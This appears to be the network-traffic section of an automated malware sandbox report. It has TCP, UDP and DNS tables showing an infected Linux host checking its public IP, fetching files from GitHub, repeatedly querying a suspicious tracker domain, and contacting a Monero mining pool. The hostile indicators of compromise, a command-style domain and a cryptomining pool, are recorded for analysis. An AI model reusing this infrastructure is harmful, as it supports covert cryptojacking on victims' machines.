Sep 21, 2024 21:26:17.648526907 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.648536921 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.665222883 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.684298038 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.684302092 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.684314013 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.702949047 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.702956915 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.718925953 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.718931913 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.718945026 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.718975067 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.735586882 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.735595942 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.751957893 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.786111116 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.786118984 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.786130905 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.803142071 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.803148985 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.803159952 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.826447964 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.844595909 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.844600916 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.844613075 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.857572079 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.857578993 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.867403030 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.878634930 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.878638983 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.878648996 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.886743069 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.886749029 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.895401955 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.904396057 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.904400110 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.904413939 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.912343025 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.912349939 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.920667887 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.930881977 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.930892944 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.940223932 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.940300941 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.940320969 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.950067997 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.958961964 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.958971977 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.958997011 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.967045069 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.967057943 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.975487947 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.983766079 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.983774900 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.983794928 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:17.991753101 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:17.991765976 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.000323057 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.009505033 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.009516001 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.009540081 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.017667055 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.017680883 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.026026011 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.034214973 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.034224033 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.034251928 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.042418957 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.042433977 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.051101923 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.168498993 CEST	32840	443	192.168.2.23	185.199.111.133
Sep 21, 2024 21:26:18.168535948 CEST	443	32840	185.199.111.133	192.168.2.23
Sep 21, 2024 21:26:18.835653067 CEST	43928	443	192.168.2.23	91.189.91.42
Sep 21, 2024 21:26:21.942243099 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:21.942331076 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:21.942399025 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:21.944861889 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:21.944900036 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.402251005 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.402595997 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.404848099 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.404898882 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.406306028 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.406322002 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.408032894 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.408108950 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.411701918 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.411792994 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.411842108 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.411859035 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.411916018 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.415092945 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.459420919 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.584566116 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.584794998 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.584893942 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.584988117 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.584988117 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.584988117 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.585016966 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:22.631162882 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.646188021 CEST	57756	443	192.168.2.23	185.199.109.133
Sep 21, 2024 21:26:22.646229029 CEST	443	57756	185.199.109.133	192.168.2.23
Sep 21, 2024 21:26:23.450651884 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:23.450741053 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:23.450812101 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:23.451738119 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:23.451777935 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.272563934 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.272874117 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.275675058 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.275702000 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.277250051 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.277311087 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.280739069 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.280837059 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.280884981 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.280900955 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.280967951 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:24.462387085 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:24.462548018 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:31.122014999 CEST	42836	443	192.168.2.23	91.189.91.43
Sep 21, 2024 21:26:31.464346886 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:31.466758966 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:35.221324921 CEST	42516	80	192.168.2.23	109.202.202.202
Sep 21, 2024 21:26:44.421783924 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:44.421905041 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:57.472743988 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:26:57.472857952 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:26:59.789963961 CEST	43928	443	192.168.2.23	91.189.91.42
Sep 21, 2024 21:27:07.898396015 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:07.898523092 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:27:12.015973091 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:12.016113997 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:27:22.407701969 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:22.407855034 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:27:32.535008907 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:32.535162926 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:27:40.705774069 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:40.705914974 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:27:51.475150108 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:27:51.475294113 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:28:01.807333946 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:28:01.807496071 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:28:18.000957966 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:28:18.001087904 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:28:37.415692091 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:28:37.415815115 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:28:50.384459972 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:28:50.384567976 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:29:00.528557062 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:29:00.528721094 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:29:10.605540037 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:29:10.605664015 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:29:22.977924109 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:29:22.978085995 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:29:39.591088057 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:29:39.591232061 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:29:51.572091103 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:29:51.572276115 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:30:01.583326101 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:30:01.583470106 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:30:11.599509954 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:30:11.599647999 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:30:20.193521976 CEST	443	50070	141.94.96.71	192.168.2.23
Sep 21, 2024 21:30:20.202647924 CEST	50070	443	192.168.2.23	141.94.96.71
Sep 21, 2024 21:30:20.202687025 CEST	443	50070	141.94.96.71	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2024 21:26:00.901061058 CEST	51218	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:00.904726982 CEST	41606	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:00.908263922 CEST	53	51218	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:00.912045956 CEST	53	41606	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:02.588829994 CEST	38257	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:02.600182056 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:07.589641094 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:07.634926081 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:12.634155035 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:12.884084940 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:12.907860994 CEST	48154	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:12.908032894 CEST	55032	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:12.917346954 CEST	53	48154	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:12.918181896 CEST	53	55032	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:14.055043936 CEST	52687	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:14.057104111 CEST	55720	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:14.062176943 CEST	53	52687	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:14.064091921 CEST	53	55720	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:17.883533001 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:17.883539915 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:21.923341036 CEST	42951	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:21.924156904 CEST	59889	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:21.930602074 CEST	53	42951	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:21.930937052 CEST	53	59889	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:23.132694960 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:23.132714033 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:23.428328991 CEST	60473	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:23.428328991 CEST	35974	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:23.436853886 CEST	53	60473	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:23.438035011 CEST	53	35974	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:23.438174009 CEST	56247	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:23.447619915 CEST	53	56247	1.1.1.1	192.168.2.23
Sep 21, 2024 21:26:28.382445097 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:28.382534981 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:33.682379961 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:33.686137915 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:38.887412071 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:38.889795065 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:44.134968996 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:44.139214993 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:49.387327909 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:49.388664961 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:54.638148069 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:54.640141964 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:26:59.887146950 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:26:59.888988972 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:05.133820057 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:05.136109114 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:10.388889074 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:10.390341043 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:15.635355949 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:15.638190031 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:20.885003090 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:20.887913942 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:26.136111021 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:26.138822079 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:31.383150101 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:31.385431051 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:36.646718979 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:36.651427984 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:41.879789114 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:41.882103920 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:47.130137920 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:47.132555962 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:52.382889032 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:52.384681940 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:27:57.628434896 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:27:57.630585909 CEST	47858	53	192.168.2.23	1.1.1.1
Sep 21, 2024 21:28:02.638544083 CEST	39039	53	192.168.2.23	8.8.8.8
Sep 21, 2024 21:28:02.638748884 CEST	47858	53	192.168.2.23	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 21, 2024 21:26:00.901061058 CEST	192.168.2.23	1.1.1.1	0xfafe	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:00.904726982 CEST	192.168.2.23	1.1.1.1	0x8835	Standard query (0)	api.ipify.org	28	IN (0x0001)	false
Sep 21, 2024 21:26:02.588829994 CEST	192.168.2.23	1.1.1.1	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:02.600182056 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:07.589641094 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:07.634926081 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:12.634155035 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:12.884084940 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:12.907860994 CEST	192.168.2.23	1.1.1.1	0xd041	Standard query (0)	github.com	28	IN (0x0001)	false
Sep 21, 2024 21:26:12.908032894 CEST	192.168.2.23	1.1.1.1	0x3f55	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:14.055043936 CEST	192.168.2.23	1.1.1.1	0xc81b	Standard query (0)	objects.githubusercontent.com	28	IN (0x0001)	false
Sep 21, 2024 21:26:14.057104111 CEST	192.168.2.23	1.1.1.1	0x63b6	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:17.883533001 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:17.883539915 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:21.923341036 CEST	192.168.2.23	1.1.1.1	0x9902	Standard query (0)	raw.githubusercontent.com	28	IN (0x0001)	false
Sep 21, 2024 21:26:21.924156904 CEST	192.168.2.23	1.1.1.1	0xc185	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.132694960 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.132714033 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:23.428328991 CEST	192.168.2.23	1.1.1.1	0x1e2f	Standard query (0)	pool.supportxmr.com	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:23.428328991 CEST	192.168.2.23	1.1.1.1	0x71f5	Standard query (0)	pool.supportxmr.com	28	IN (0x0001)	false
Sep 21, 2024 21:26:23.438174009 CEST	192.168.2.23	1.1.1.1	0xa500	Standard query (0)	pool-fr.supportxmr.com	28	IN (0x0001)	false
Sep 21, 2024 21:26:28.382445097 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:28.382534981 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:33.682379961 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:33.686137915 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:38.887412071 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:38.889795065 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:44.134968996 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:44.139214993 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:49.387327909 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:49.388664961 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:54.638148069 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:54.640141964 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:26:59.887146950 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:26:59.888988972 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:05.133820057 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:05.136109114 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:10.388889074 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:10.390341043 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:15.635355949 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:15.638190031 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:20.885003090 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:20.887913942 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:26.136111021 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:26.138822079 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:31.383150101 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:31.385431051 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
Sep 21, 2024 21:27:36.646718979 CEST	192.168.2.23	8.8.8.8	0x5488	Standard query (0)	vmtracker.freechildporninthisserver.lol	A (IP address)	IN (0x0001)	false
Sep 21, 2024 21:27:36.651427984 CEST	192.168.2.23	1.1.1.1	0xa868	Standard query (0)	vmtracker.freechildporninthisserver.lol	28	IN (0x0001)	false
